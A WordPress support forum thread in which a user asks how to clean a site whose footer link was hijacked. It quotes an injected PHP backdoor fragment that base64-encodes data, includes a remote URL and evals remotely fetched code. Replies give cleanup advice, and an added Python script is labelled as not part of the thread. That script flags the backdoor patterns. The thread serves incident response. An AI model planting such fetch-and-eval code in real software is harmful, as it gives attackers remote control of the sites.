WordPress Link got Hacked

  • One of my friend’s footer links got hacked. His Powered by WordPress link points to a different URL instead of I searched for exploits in his WordPress theme files.. And found that the hacker used this code to call the hacked URL.

    <?=@get_wp_results('f');?>

    I can’t find the injected code!! Where is it, in the database or somewhere else? Need help, guys… I am just a newb…

Viewing 15 replies - 1 through 15 (of 15 total)
  • any Updates..??


    Refer this article:


    Shane G.



    Forum Janitor

    Some theme authors change the URLs to point to their theme website. Is it a customised theme?

    It’s a customized theme. It was pointing to before hack. I searched through the internet and found the hacker injected some .php file with this code

    <? error_reporting(0);
    $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".". base64_encode($d).".". base64_encode($e).".". base64_encode($f).".". base64_encode($g).".". base64_encode($h).".$s.". base64_encode($i) .".". base64_encode($j);
    else if(include(base64_decode("...").base64_decode("...")."/?".$str));
    else if($c=file_get_contents(base64_decode("...").$str))eval($c);
    }; ?>

    I deleted all the files. But his Powered by WordPress link points to a different URL instead of I think the hacker injected something in the database.

    anyone.. Out there??? to help me out…

    I found some base64 code in wp-admin, and also some new file names. I deleted those files. But no code in the database. Is there any way I can find that..??

    Koydin, your server would have to be badly misconfigured for those hacks to run in the first place, since there is no <?php tag in the code. If I were you, I’d start from scratch with a new server environment and a new copy of all the WordPress files.

    Koydin, have you checked out this thread ~ ~ it might be simply a matter of removing/editing the affected files from the backdoor ~

    and most of these are likely related to the same problem you may have ~

    Koydin, can you help me out with this virus? I got hacked like you, but I haven’t found the virus until now. Can you send me the code that you found or some help? Thank you. And please hurry, while all my blogs are hacked at this time on that hostgator server.

    Moderator Jan Dembowski


    Brute Squad and Volunteer Moderator

    Can you send me the code that you found or some help.

    You’ve got a lot of work ahead of you. Here are the boilerplate links for delousing your hacked blog.

    How To Completely Clean Your Hacked WordPress Installation

    How to find a backdoor in a hacked WordPress

    RVoodoo has written up his experience too.

    Once you’ve cleaned out your installation, harden it to stop (or at least slow down) this from happening again.

    Good luck.

    My problem is that I found the <?=@get_wp_results('f');?> code only in my footer, but I haven’t found anything else until now. And it is changing my links but my footer doesn’t show up. for example

    So I need to find a modified file or something so I can start to hunt it down. But nothing until now. I searched in my database, I downloaded my whole website, and am searching for “eval”, “base64” and these types of codes in them.

    Moderator Jan Dembowski


    Brute Squad and Volunteer Moderator

    Sorry, but every file in your installation is suspect, as well as your database. That’s what it means to be hacked.

    If you want to fix it then you need to replace every file you can with the freshly downloaded original files, hunt through any files you have left, and scour your database.

    Anything less than that won’t find it. Once you have found it, then you need to close the door that the attacker came in through.

    It’s a metric ton of work but that’s what is needed. Once again, good luck. The work is outlined in those links.
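    Added example, not part of any reply in this thread and not WordPress project code: one way to organise the file side of that cleanup is to hash the live tree against a freshly downloaded copy of the same WordPress version, then scan every file the clean copy cannot vouch for with patterns taken from the snippets quoted above. The function names, the `site`/`clean` directories and the sample files built in `demo()` are assumptions constructed for illustration; the database still has to be searched separately.

```python
import hashlib, re, tempfile
from pathlib import Path

# Patterns taken from the snippets quoted in this thread.
INDICATORS = {
    "get_wp_results call": re.compile(r"get_wp_results\s*\("),
    "eval of variable": re.compile(r"\beval\s*\(\s*\$"),
    "include of base64_decode": re.compile(r"\binclude\s*\(\s*base64_decode\s*\("),
    "remote fetch + base64": re.compile(r"file_get_contents\s*\(\s*base64_decode\s*\("),
}

def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def triage(site, clean):
    """Compare a site tree with a pristine copy; scan what the copy cannot vouch for."""
    site, clean = Path(site), Path(clean)
    report = {"modified": [], "unknown": [], "hits": {}}
    for f in sorted(p for p in site.rglob("*") if p.is_file()):
        rel = f.relative_to(site).as_posix()
        ref = clean / rel
        if ref.is_file():
            if digest(f) == digest(ref):
                continue                       # identical to the original
            report["modified"].append(rel)     # core file changed: replace it
        else:
            report["unknown"].append(rel)      # theme, upload or dropped file
        text = f.read_text(errors="replace")
        found = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if found:
            report["hits"][rel] = found
    return report

def demo():
    """Build two small constructed trees (sample data) and triage them."""
    root = Path(tempfile.mkdtemp())
    clean, site = root / "clean", root / "site"
    for base in (clean, site):
        (base / "wp-admin").mkdir(parents=True)
        (base / "wp-admin/index.php").write_text("<?php // core file\n")
    (site / "wp-admin/index.php").write_text("<?php // core file\n$c = 1; eval($c);\n")
    theme = site / "wp-content/themes/custom"
    theme.mkdir(parents=True)
    (theme / "footer.php").write_text("<div><?=@get_wp_results('f');?></div>\n")
    (theme / "style.css").write_text("body { margin: 0 }\n")
    return triage(site, clean)

if __name__ == "__main__":
    print(demo())
```

    Files listed under "modified" are overwritten from the clean copy; files under "unknown" have no original to compare against and need reading by hand, starting with the ones that also appear under "hits".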

    Yeah, I understand that, but until I find the modified files I don’t want to replace anything. I have now removed the injected code from the footers and I’m waiting to see if it will appear again however. I still have the virus in my sites. If it’s not only injected somehow.

  • The topic ‘WordPress Link got Hacked’ is closed to new replies.